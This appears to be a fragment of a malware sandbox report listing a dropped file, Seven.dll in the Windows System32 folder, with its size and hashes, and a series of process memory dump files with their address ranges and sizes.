56d99039e0fb6305588e9f87361e7e0d5051507bf321ba36619c4d29741f35c27c62f025a52523c9e1c7287aabf1533444330a8cdf840fa5af0fa2241fcb4fc2

Download Submit
C:\Windows\System32\Seven.dll

Filesize
1.3MB

MD5
1f7090825cea66e6650e2c08df750bd4

SHA1
abef7ba313d81b2ca3fa3c55621e1f5077057d19

SHA256
0584db4656c638c0e515fa0793d3f174aa7f094615429f717029744e6299a10a

SHA512
e186acf360fc2adc7e28fbd556f302c6273fdc3dc94516c2a1cbf1e30dd271e068892f3aa2fca03e92a48070cfa0777b70d79a59154bba843e7efa3d394a7a39

Download Submit
memory/3776-11-0x00007FFCE9930000-0x00007FFCEA3F1000-memory.dmp

Filesize
10.8MB

Download
memory/3776-12-0x000001DA986D0000-0x000001DA986E0000-memory.dmp

Filesize
64KB

Download
memory/3776-16-0x00007FFCE9930000-0x00007FFCEA3F1000-memory.dmp

Filesize
10.8MB

Download
memory/3776-10-0x000001DAFDF20000-0x000001DAFDF42000-memory.dmp

Filesize
136KB

Download
memory/3776-13-0x000001DA986D0000-0x000001DA986E0000-memory.dmp

Filesize
64KB

Download
memory/17644-528-0x00007FF616440000-0x00007FF6164A7000-memory.dmp

Filesize
412KB

Download
memory/17788-533-0x00007FF616440000-0x00007FF6164A7000-memory.dmp

Filesize
412KB

Download